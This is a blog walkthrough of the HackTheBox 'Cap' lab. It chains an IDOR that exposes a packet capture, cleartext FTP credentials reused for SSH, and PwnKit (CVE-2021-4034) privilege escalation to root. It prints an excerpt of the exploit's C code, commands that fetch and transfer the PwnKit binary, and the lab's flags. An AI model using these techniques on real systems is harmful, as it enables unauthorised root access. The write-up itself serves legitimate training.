CyberNexusBlog

Cap HTB Walkthrough - Exploiting IDOR and PwnKit

Youssef Ketaj's photo
Youssef Ketaj

6 min read

Cover Image for Cap HTB Walkthrough - Exploiting IDOR and PwnKit

Introduction

Cap is an easy-difficulty Linux machine from HackTheBox that demonstrates the importance of proper access controls and keeping systems updated. This walkthrough covers the complete exploitation path from initial reconnaissance to privilege escalation.

Target Information

IP Address: 10.10.10.245
Hostname: cap.htb

Add the following entry to your /etc/hosts file:

10.10.10.245 cap.htb

Reconnaissance & Enumeration

Port Scanning

I started with a comprehensive port scan using rustscan to identify open services:

rustscan -a 10.10.10.245 --ulimit 5000 -- -sV -sC

Results:

  • Port 21: FTP (vsftpd 3.0.3)

  • Port 22: SSH (OpenSSH 8.2p1 Ubuntu)

  • Port 80: HTTP (gunicorn web server)

The scan revealed a standard Ubuntu system with three common services running.

Service Enumeration

FTP Service Analysis (Port 21)

I attempted anonymous FTP access but was unsuccessful:

ftp 10.10.10.245
# Tried anonymous login - failed
# 530 Login incorrect

Anonymous access was denied, so I moved on to other services.

SSH Service Analysis (Port 22)

SSH was running a recent version (OpenSSH 8.2p1) with no obvious vulnerabilities. Without credentials, I proceeded to web service enumeration.

Web Service Analysis (Port 80)

The web server hosted a "Security Dashboard" application. Initial exploration revealed:

  1. Main Dashboard: A security monitoring interface

  2. Data Download Feature: Ability to download network capture files

The most interesting feature was a data download page that allowed users to download PCAP files:

Exploitation

IDOR Vulnerability Discovery

While examining the data download functionality, I noticed the URL structure:

http://cap.htb/data/[ID]

This suggested a potential Insecure Direct Object Reference (IDOR) vulnerability. The application was likely serving different data files based on the ID parameter without proper authorization checks.

I tested this by changing the data ID from the default value to 0, attempting to access potentially older or different data:

curl -o data0.pcap http://cap.htb/data/0

PCAP File Analysis

The downloaded PCAP file contained network traffic that revealed valuable information. Using Wireshark for analysis, I discovered:

  1. FTP Connection Logs: Clear-text FTP authentication attempts

  2. Credentials Exposure: Username and password transmitted in plain text

From the packet analysis, I extracted the following credentials:

Discovered Credentials:

  • Username: nathan

  • Password: Buck3tH4TF0RM3!

Initial Access via FTP

With the discovered credentials, I successfully authenticated to the FTP service:

ftp 10.10.10.245
# Username: nathan
# Password: Buck3tH4TF0RM3!

User Flag: e5f9e5793b86300994c4cad177ace7f6

Credential Reuse Attack

Testing for password reuse, I attempted SSH authentication with the same credentials:

ssh nathan@cap.htb
# Password: Buck3tH4TF0RM3!

The attack was successful! This demonstrates a common security weakness where users reuse passwords across multiple services.

Privilege Escalation

System Enumeration

After gaining initial access as user nathan, I performed standard privilege escalation enumeration:

# Check user privileges
id
sudo -l  # No sudo privileges

# System information
uname -a
# Linux cap 5.4.0-80-generic #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021

# Search for SUID binaries
find / -perm -u=s -type f 2>/dev/null

The enumeration revealed several standard SUID binaries, including pkexec.

PwnKit Vulnerability (CVE-2021-4034)

I checked the pkexec version and found it was vulnerable to the PwnKit vulnerability:

pkexec --version
# pkexec version 0.105

This version is vulnerable to CVE-2021-4034, a memory corruption vulnerability in polkit's pkexec that allows local privilege escalation.

Understanding the PwnKit Exploit

What is PwnKit?

PwnKit (CVE-2021-4034) is a critical vulnerability discovered in January 2022 that affects polkit's pkexec utility. This vulnerability has been present in the code for over 12 years, affecting virtually all major Linux distributions.

Technical Details

Polkit Overview:

  • Polkit (formerly PolicyKit) is a system service that controls system-wide privileges on Unix-like systems

  • pkexec is a component that allows authorized users to execute commands as another user (similar to sudo)

  • It's installed by default on most Linux distributions

The Vulnerability: The vulnerability exists in the argument processing logic of pkexec. When pkexec is called without any arguments, it:

  1. Out-of-bounds Write: The program writes a null terminator (\0) to an out-of-bounds memory location

  2. Environment Variable Manipulation: By carefully crafting environment variables, an attacker can control what gets overwritten

  3. Code Execution: This memory corruption can be leveraged to achieve arbitrary code execution with root privileges

Exploit Mechanism

The exploit works by:

  1. Creating Malicious Environment Variables:

     GCONV_PATH=.
 CHARSET=pkexec
 SHELL=pkexec

  2. Setting up a Fake gconv Module:

    • Creates a directory structure that mimics glibc's character conversion modules

    • Places a malicious shared library that will be loaded

  3. Triggering the Vulnerability:

    • Calls pkexec with no arguments to trigger the out-of-bounds write

    • The memory corruption causes the system to load the attacker's malicious code

    • The malicious code executes with root privileges

Exploit Code Analysis

The PwnKit exploit I used contains several key components:

// Key sections of the exploit:

// 1. Directory and file creation for the fake gconv module
res = mkdir("GCONV_PATH=.", 0777);
res = mkdir(".pkexec", 0777);

// 2. Creating the gconv-modules configuration
fp = fopen(".pkexec/gconv-modules", "w+");
fputs("module UTF-8// PKEXEC// pkexec 2", fp);

// 3. The gconv_init function that gets executed as root
void gconv_init()
{
    setresuid(0, 0, 0);  // Set real, effective, and saved UIDs to root
    setresgid(0, 0, 0);  // Set real, effective, and saved GIDs to root

    // Execute shell with root privileges
    execve("/bin/bash", (char *[]){"-i", NULL}, NULL);
}

Why This Exploit is So Dangerous

  1. Universal Impact: Affects virtually all Linux systems with polkit installed

  2. No Authentication Required: Any local user can exploit it

  3. Reliable Exploitation: The exploit works consistently across different systems

  4. Stealth: Leaves minimal traces in system logs

  5. Age of Vulnerability: Present in code for over 12 years before discovery

Exploit Deployment

I downloaded the PwnKit exploit from the ly4k repository:

# On attacking machine
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

# Transfer to target
python -m http.server 8000

# On target machine
curl http://10.10.14.93:8000/PwnKit -o PwnKit
chmod +x PwnKit

Root Access

Executing the PwnKit exploit successfully escalated privileges to root:

./PwnKit
# root@cap:/home/nathan#

Root Flag: 275b280d0b34b7b387122b9885386684

Key Takeaways

This machine highlighted several important security concepts:

  1. IDOR Vulnerabilities: Improper access controls can expose sensitive data

  2. Credential Reuse: Using the same passwords across services creates security risks

  3. Clear-text Protocols: FTP transmits credentials in plain text

  4. Patch Management: Keeping systems updated prevents known vulnerability exploitation

Remediation Recommendations

  • Implement proper authorization checks for data access

  • Enforce strong, unique passwords for different services

  • Use encrypted protocols (SFTP/SSH instead of FTP)

  • Maintain regular system updates and security patches

  • Monitor network traffic for suspicious activities

Conclusion

Cap demonstrates how multiple security weaknesses can be chained together for complete system compromise. The attack path from IDOR to credential disclosure to privilege escalation shows the importance of defense in depth and regular security assessments.